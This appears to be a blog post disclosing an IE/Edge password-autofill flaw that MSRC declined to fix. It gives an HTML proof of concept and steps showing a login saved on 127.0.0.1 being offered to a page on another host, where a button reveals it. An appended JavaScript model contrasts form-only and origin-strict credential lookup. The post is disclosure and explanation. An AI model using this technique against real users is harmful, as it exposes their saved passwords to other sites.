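December 2016

A submission that was not considered a security issue

Submitted: 3-18
Final confirmation: 4-10

MSRC: The issue exists but is not serious; it will not be fixed.
Affected: IE/EDGE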

<input type="text" id="url" value="http://localhost.fbi.gov/a.htm" /><button onclick="document.getElementById('www').src=document.getElementById('url').value">Navigate</button><br/>
<iframe src="about:blank" id="www"></iframe>

<p>---------------------------------------------------------------</p>
<p>step1: put this HTML at http://127.0.0.1/a.htm </p>
<p>step2: fill in the form below and let the browser remember the password</p>
<form action="b.htm" method="post">
<input type="text" id="username" name="username"/>
<input type="password" id="password" name="password"/><br />
<input type="submit" name="commit" value="Log in"/>
</form>
<button onclick="alert('stored password: ' + document.getElementById('password').value + ', from: ' + location.href)">show password</button>
<p>step3: go back to this page and navigate to "http://localhost.fbi.gov/a.htm", or any other website that has the same form as the code above.</p>
<p>step4: the user can fill the form with the account/password remembered on 127.0.0.1.</p>
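
The steps above show a login saved on http://127.0.0.1/a.htm being offered on http://localhost.fbi.gov/a.htm. As an added example (not part of the original post and not IE/Edge code), this model of a saved-password store contrasts a lookup keyed only on the form with one keyed on the exact origin. The names originOf, formSignature, CredentialStore and demo, and the sample login, are constructed; matching on the form alone is an assumption taken from step 3's "same form" wording.

```javascript
// Added example (constructed model, not IE/Edge code).
// Hypothetical names: originOf, formSignature, CredentialStore, demo.

// Reduce a page URL to its origin: scheme + host + non-default port.
function originOf(pageUrl) {
  const u = new URL(pageUrl);
  return (u.protocol === "http:" || u.protocol === "https:") ? u.origin : null;
}

// A login form as the store sees it: action plus sorted field names.
function formSignature(form) {
  return form.action + "|" + [...form.fields].sort().join(",");
}

class CredentialStore {
  constructor() { this.entries = []; }

  save(pageUrl, form, username, password) {
    this.entries.push({ origin: originOf(pageUrl), sig: formSignature(form), username, password });
  }

  // Weak: any page showing the same form is offered the saved login.
  lookupByFormOnly(pageUrl, form) {
    const sig = formSignature(form);
    return this.entries.filter((e) => e.sig === sig);
  }

  // Strict: the requesting origin must equal the saving origin exactly.
  lookupByOrigin(pageUrl, form) {
    const origin = originOf(pageUrl);
    if (origin === null) return [];
    const sig = formSignature(form);
    return this.entries.filter((e) => e.origin === origin && e.sig === sig);
  }
}

// Constructed sample data using the two URLs from the steps above.
function demo() {
  const form = { action: "b.htm", fields: ["username", "password"] };
  const store = new CredentialStore();
  store.save("http://127.0.0.1/a.htm", form, "alice", "constructed-secret");
  const other = "http://localhost.fbi.gov/a.htm";
  return {
    weakOnOtherHost: store.lookupByFormOnly(other, form).length,
    strictOnOtherHost: store.lookupByOrigin(other, form).length,
    strictOnSavingHost: store.lookupByOrigin("http://127.0.0.1:80/a.htm", form).length,
  };
}

console.log(demo());
```

The strict lookup still returns the entry for http://127.0.0.1:80/a.htm because the URL parser drops the default port, so both URLs share one origin.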